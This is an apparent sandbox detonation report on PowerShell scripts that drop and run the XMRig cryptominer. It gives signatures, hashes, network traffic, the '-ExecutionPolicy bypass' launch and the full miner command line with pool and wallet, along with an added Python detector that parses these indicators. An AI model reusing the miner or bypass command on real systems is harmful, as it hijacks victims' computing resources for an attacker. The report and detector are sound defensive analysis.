xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rmndrb24.elr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:04

Platform

win10v2004-20240508-en

Max time kernel

1794s

Max time network

1807s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4368,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=1416 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4040,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=3740 /prefetch:8

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jwuyalkd.h3o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:07

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits recorded; Description, Indicator, Process and Target are N/A for every hit of this signature.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 216.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
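
The two Processes entries above are the whole chain this detonation saw: PowerShell started with -ExecutionPolicy bypass on a script in the user's Temp folder, then a dropped xmrig.exe launched from that same Temp folder with a stratum+ssl pool, a wallet in unMineable's COIN:address.worker form and the throwaway password x (the SeLockMemoryPrivilege adjustments in the Signatures section are XMRig requesting large pages for its RandomX dataset). As an added example, not code from this report, from the sandbox or from XMRig, the Python below turns those two command lines into a detection and an IOC record: it flags any process whose command line carries a stratum URL, checks whether its parent is a bypass-mode PowerShell running a script from Temp, and parses the miner's -a/-o/-u/-p options into pool host, port, TLS flag, coin, wallet and worker. The process records are constructed for the example: the pids follow the memory/<pid>-... dump names in the Files section, but the parent-child link and the event layout are assumptions, since the report does not record them.

```python
import re
from urllib.parse import urlsplit

# Constructed process-creation records. Image paths and command lines are the two
# Processes entries of this analysis; pids follow the memory dump names; the
# ppid link is an assumption for the example (the report does not record it).
EVENTS = [
    {"pid": 2860, "ppid": 4000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File '
                r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"'},
    {"pid": 3996, "ppid": 2860,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
                r'-o stratum+ssl://rx.unmineable.com:443 '
                r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac '
                r'-p x'},
]

STRATUM_URL = re.compile(r"stratum\+(?:tcp|ssl)://\S+", re.IGNORECASE)
IN_USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
BYPASS_FLAG = re.compile(r"-ExecutionPolicy\s+bypass\b", re.IGNORECASE)
SCRIPT_FROM_TEMP = re.compile(r'-File\s+"?[^"]*\\AppData\\Local\\Temp\\', re.IGNORECASE)
# Base58 alphabet used by Monero addresses (no 0, O, I, l).
BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")
# XMRig options this parser understands; only the space-separated forms.
OPTION_NAMES = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
                "-u": "user", "--user": "user", "-p": "password", "--pass": "password"}


def split_windows_cmdline(cmdline):
    """Minimal argv splitter: a double-quoted run is one token, everything else
    is whitespace-separated. Enough for the command lines in this report."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def parse_xmrig_cmdline(cmdline):
    """Extract pool, wallet and worker from an XMRig command line."""
    argv = split_windows_cmdline(cmdline)
    opts, i = {}, 1
    while i < len(argv):
        key = OPTION_NAMES.get(argv[i])
        if key and i + 1 < len(argv):
            opts[key] = argv[i + 1]
            i += 2
        else:
            i += 1
    url = urlsplit(opts.get("url", ""))
    # unMineable's -u field is COIN:address.worker; other pools use a bare address.
    coin, sep, rest = opts.get("user", "").partition(":")
    if not sep:
        coin, rest = None, coin
    wallet, _, worker = rest.partition(".")
    return {"algo": opts.get("algo"), "pool_host": url.hostname, "pool_port": url.port,
            "tls": url.scheme.lower() == "stratum+ssl", "coin": coin,
            "wallet": wallet, "worker": worker or None, "password": opts.get("password")}


def looks_like_monero_address(addr):
    """Standard Monero addresses: 95 base58 chars starting with 4 (subaddresses: 8)."""
    return len(addr) == 95 and addr[0] in "48" and set(addr) <= BASE58


def is_bypass_powershell_from_temp(event):
    """PowerShell started with -ExecutionPolicy bypass on a script under
    the user's AppData\\Local\\Temp, as in this report's command line."""
    cl = event["cmdline"]
    return (event["image"].lower().endswith("powershell.exe")
            and BYPASS_FLAG.search(cl) is not None
            and SCRIPT_FROM_TEMP.search(cl) is not None)


def flag_miner_chain(events):
    """One finding per process that names a stratum pool, with the context a
    responder needs: dropped in Temp? parent a bypass-mode PowerShell? pool IOCs."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not STRATUM_URL.search(e["cmdline"]):
            continue
        parent = by_pid.get(e["ppid"])
        findings.append({
            "pid": e["pid"],
            "image": e["image"],
            "dropped_in_temp": IN_USER_TEMP.search(e["image"]) is not None,
            "parent_is_bypass_powershell": bool(parent and is_bypass_powershell_from_temp(parent)),
            "pool": parse_xmrig_cmdline(e["cmdline"]),
        })
    return findings


if __name__ == "__main__":
    for finding in flag_miner_chain(EVENTS):
        print(finding)
```

Run it directly to print the finding, or feed it real process-creation events (Sysmon event 1, EDR telemetry) by filling EVENTS with the same four fields. The wallet and worker name are the durable indicators: the pool host and the dropped path change between campaigns, the payout address rarely does.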

Files

memory/2860-0-0x00007FF9181B3000-0x00007FF9181B5000-memory.dmp

memory/2860-1-0x0000019A7E8D0000-0x0000019A7E8F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rtn2ipjd.rvr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2860-11-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-12-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-14-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-15-0x0000019A7F270000-0x0000019A7F282000-memory.dmp

memory/2860-16-0x0000019A7F040000-0x0000019A7F04A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3996-47-0x0000019D19B10000-0x0000019D19B30000-memory.dmp

memory/3996-48-0x0000019D19B60000-0x0000019D19B80000-memory.dmp

memory/3996-49-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/2860-51-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/2860-50-0x00007FF9181B3000-0x00007FF9181B5000-memory.dmp

memory/3996-52-0x0000019D19B80000-0x0000019D19BA0000-memory.dmp

memory/3996-53-0x0000019D19BA0000-0x0000019D19BC0000-memory.dmp

memory/3996-54-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/2860-55-0x00007FF9181B0000-0x00007FF918C71000-memory.dmp

memory/3996-56-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-58-0x0000019D19B80000-0x0000019D19BA0000-memory.dmp

memory/3996-57-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-59-0x0000019D19BA0000-0x0000019D19BC0000-memory.dmp

memory/3996-60-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-61-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-62-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-63-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-64-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-65-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-66-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-67-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-68-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-69-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-70-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-71-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-72-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-73-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-74-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-75-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-76-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-77-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-78-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-79-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-80-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-81-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-82-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-83-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-84-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-85-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-86-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-87-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-88-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-89-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-90-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-91-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-92-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-93-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-94-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-95-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-96-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-97-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-98-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-99-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-100-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-101-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-102-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-103-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-104-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-105-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-106-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-107-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-108-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-109-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-110-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-111-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-112-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-113-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-114-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-115-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-116-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-117-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

memory/3996-118-0x00007FF6C5BD0000-0x00007FF6C6803000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:07

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits recorded; Description, Indicator, Process and Target are N/A for every hit of this signature.

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4828-0-0x00007FFCE7FB3000-0x00007FFCE7FB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwyzr24o.una.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4828-9-0x000001D3BF890000-0x000001D3BF8B2000-memory.dmp

memory/4828-10-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4828-11-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4828-12-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4828-14-0x000001D3BFD90000-0x000001D3BFDA2000-memory.dmp

memory/4828-15-0x000001D3BFB00000-0x000001D3BFB0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4440-46-0x0000025450990000-0x00000254509B0000-memory.dmp

memory/4440-47-0x00000254509D0000-0x00000254509F0000-memory.dmp

memory/4440-48-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4828-50-0x00007FFCE7FB3000-0x00007FFCE7FB5000-memory.dmp

memory/4828-51-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4440-49-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-53-0x00000254509F0000-0x0000025450A10000-memory.dmp

memory/4440-52-0x00000254522C0000-0x00000254522E0000-memory.dmp

memory/4828-54-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4440-55-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-56-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-58-0x00000254509F0000-0x0000025450A10000-memory.dmp

memory/4440-57-0x00000254522C0000-0x00000254522E0000-memory.dmp

memory/4440-59-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-60-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-61-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-62-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-63-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-64-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-65-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-66-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-67-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-68-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-69-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-70-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-71-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-72-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-73-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-74-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-75-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-76-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-77-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-78-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-79-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-80-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-81-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-82-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-83-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-84-0x00007FF708240000-0x00007FF708E73000-memory.dmp

